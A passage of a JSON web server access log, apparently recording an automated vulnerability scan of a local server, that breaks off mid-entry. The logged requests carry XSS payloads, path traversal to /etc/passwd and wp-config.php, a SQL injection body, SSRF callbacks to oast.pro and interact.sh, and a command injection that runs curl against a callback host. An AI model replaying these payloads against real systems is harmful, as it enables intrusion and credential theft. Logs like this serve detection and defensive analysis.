/ie50/system/login/SysLoginUser.aspx?Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MyErrors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/backup-db/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /faces/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /htaccess_for_page_not_found_redirects.htaccess HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /getFavicon?host=http://ca2tuc8smpv1g2s80ca0nnmxdphy9dbzz.oast.pro HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://example.com/example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/taskProc/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.feed HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.well-known/apple-app-site-association HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json///a.js?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /slr/application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/api/latest/serverInfo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"\x0D\x0A\x0D\x0Apingback.ping\x0D\x0A\x0D\x0A\x0D\x0Ahttp://ca2tuc8smpv1g2s80ca0bjw33jew7kdqd.oast.pro\x0D\x0A\x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /xmlrpc/pingback HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.039","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /global-protect/login.esp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/profile HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system/login/SysLoginUser.aspx?Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /druid/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /filezilla.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"aws.interact.sh","request":"GET http://aws.interact.sh/openstack/latest HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.188","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /horde/admin/user.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v3/users HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"email='+or+2>1+--+&password=&login=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /scrm/crm/admin HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://example.com/https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/taskProc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.feed.servlet HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json///a.html?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /well-known/apple-app-site-association HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /gsearch.php.en?prod=';prompt`document.domain`;// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webalizer/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sslmgr HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /alps/profile HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /kylin/api/admin/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logs.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/database.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sitemanager.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secureader/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/user.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/weekender/friend.php?id=MTA0&link=aHR0cHM6Ly9leGFtcGxlLmNvbQ== HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://www.%5C.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/mstrWeb/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///querybuilder.feed HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apple-app-site-association HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=woo_ce&failed=1&message=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/oxygen-theme/download.php?file=../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php?page=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?page=acymailing_front&ctrl=frontusers&noheader=1&user[email]=example@mail.com&ctrl=frontusers&task=subscribe&option=acymailing&redirect=https://example.com&ajax=0&acy_source=widget%202&hiddenlists=1&acyformname=formAcym93841&acysubmode=widget_acym HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /seeyon/thirdpartyController.do.css/..;/ajax.do HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /env HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_omphotogallery&controller=../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"\x22name\x22:\x22';$(curl http://ca2tuc8smpv1g2s80ca05y9onb9e4jqn8.oast.pro);'\x22,\x0D\x0A\x22email\x22:\x22a@b.c\x22","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/readycloud_control.cgi?1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111/api/users HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) 